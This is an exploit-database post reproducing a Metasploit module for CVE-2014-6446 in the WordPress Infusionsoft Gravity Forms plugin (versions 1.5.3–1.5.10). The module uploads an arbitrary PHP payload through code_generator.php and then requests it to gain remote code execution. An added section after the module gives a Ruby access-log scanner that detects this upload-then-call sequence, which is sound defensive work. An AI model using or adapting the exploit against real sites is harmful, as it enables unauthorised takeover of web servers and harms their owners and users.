
WordPress InfusionSoft Upload Exploit

feng
Full title: WordPress InfusionSoft Upload Exploit
Date added: 2014-10-09
Category: web applications
Platform: php
Risk:
CVE: CVE-2014-6446

Description:
This Metasploit module exploits an arbitrary PHP code upload in the WordPress Infusionsoft Gravity Forms plugin, versions 1.5.3 to 1.5.10. The vulnerability allows arbitrary file upload and remote code execution.

EXP:

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress InfusionSoft Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the wordpress Infusionsoft Gravity
        Forms plugin, versions from 1.5.3 to 1.5.10. The vulnerability allows for arbitrary file
        upload and remote code execution.
      },
      'Author'         =>
        [
          'g0blin',                    # Vulnerability Discovery
          'us3r777 <us3r777@n0b0.so>'  # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2014-6446'],
          ['URL', 'http://research.g0blin.co.uk/cve-2014-6446/'],
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Infusionsoft 1.5.3 - 1.5.10', {}]],
      'DisclosureDate' => 'Sep 25 2014',
      'DefaultTarget'  => 0)
    )
  end
  def check
    res = send_request_cgi(
      'uri'    => normalize_uri(wordpress_url_plugins, 'infusionsoft', 'Infusionsoft', 'utilities', 'code_generator.php')
    )
    if res && res.code == 200 && res.body =~ /Code Generator/ && res.body =~ /Infusionsoft/
      return Exploit::CheckCode::Detected
    end
    Exploit::CheckCode::Safe
  end
  def exploit
    php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
    res = send_request_cgi({
      'uri'       => normalize_uri(wordpress_url_plugins, 'infusionsoft',
                     'Infusionsoft', 'utilities', 'code_generator.php'),
      'method'    => 'POST',
      'vars_post' =>
      {
        'fileNamePattern' => php_pagename,
        'fileTemplate'    => payload.encoded
      }
    })
    if res && res.code == 200 && res.body && res.body.to_s =~ /Creating File/
      print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
      register_files_for_cleanup(php_pagename)
    else
      fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}")
    end
    print_status("#{peer} - Calling payload ...")
    send_request_cgi({
      'uri'       => normalize_uri(wordpress_url_plugins, 'infusionsoft',
                     'Infusionsoft', 'utilities', php_pagename)
    }, 2)
  end
end
# 427C3B60F50B06D8   1337day.com [2014-10-09]   3CE1B3F435C7F156 #
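
The module above makes up to three requests: an optional check GET to code_generator.php, a POST to it, and a request for a newly created .php file in the same utilities directory. The following is an added example, not part of the original post or of the Metasploit project, that looks for that sequence in a web server access log. The combined log format, the allowlist, the sample log lines and all function names are assumptions.

```ruby
# Added detection example; not part of the Metasploit module above.
# Assumption: access log in combined format; only the leading fields are parsed.
LOG_LINE = /\A(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) /
# Directory the module posts to and later fetches its dropped file from.
UTIL_DIR = %r{/plugins/infusionsoft/Infusionsoft/utilities/([^/?\s]+\.php)}i
GENERATOR = 'code_generator.php'
# Assumption: only code_generator.php is named on the page; extend this
# allowlist from a clean copy of the plugin before relying on the results.
KNOWN_SCRIPTS = [GENERATOR].freeze

# Returns one finding per request that touches the utilities directory.
def scan_access_log(lines)
  lines.each_with_object([]) do |line, findings|
    next unless (m = LOG_LINE.match(line))
    ip, time, method, path, status = m.captures
    next unless (script = path[UTIL_DIR, 1])
    kind =
      if script.casecmp?(GENERATOR)
        method == 'POST' ? :generator_post : :generator_probe
      elsif KNOWN_SCRIPTS.none? { |s| s.casecmp?(script) }
        :unknown_script_request
      end
    next unless kind
    findings << { kind: kind, ip: ip, time: time, script: script, status: status.to_i }
  end
end

# True when a client whose POST to the generator returned 200 also requested
# a script outside the allowlist: the upload-then-call sequence.
def upload_then_call?(findings)
  posters = findings.select { |f| f[:kind] == :generator_post && f[:status] == 200 }
                    .map { |f| f[:ip] }
  findings.any? { |f| f[:kind] == :unknown_script_request && posters.include?(f[:ip]) }
end

# Constructed sample lines (documentation IP ranges, invented file name).
BASE = '/wp-content/plugins/infusionsoft/Infusionsoft/utilities'
SAMPLE_LOG = [
  '192.0.2.10 - - [09/Oct/2014:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120',
  %(198.51.100.7 - - [09/Oct/2014:10:00:05 +0000] "GET #{BASE}/code_generator.php HTTP/1.1" 200 812),
  %(198.51.100.7 - - [09/Oct/2014:10:00:06 +0000] "POST #{BASE}/code_generator.php HTTP/1.1" 200 930),
  %(198.51.100.7 - - [09/Oct/2014:10:00:07 +0000] "GET #{BASE}/AbCdEfGhIj.php HTTP/1.1" 200 0),
  '192.0.2.10 - - [09/Oct/2014:10:00:09 +0000] "GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1" 200 77'
].freeze

scan_access_log(SAMPLE_LOG).each { |f| puts f }
```

On a site running plugin versions 1.5.3 to 1.5.10, an `:unknown_script_request` finding is a reason to inspect the utilities directory for .php files that are not part of the plugin's distribution.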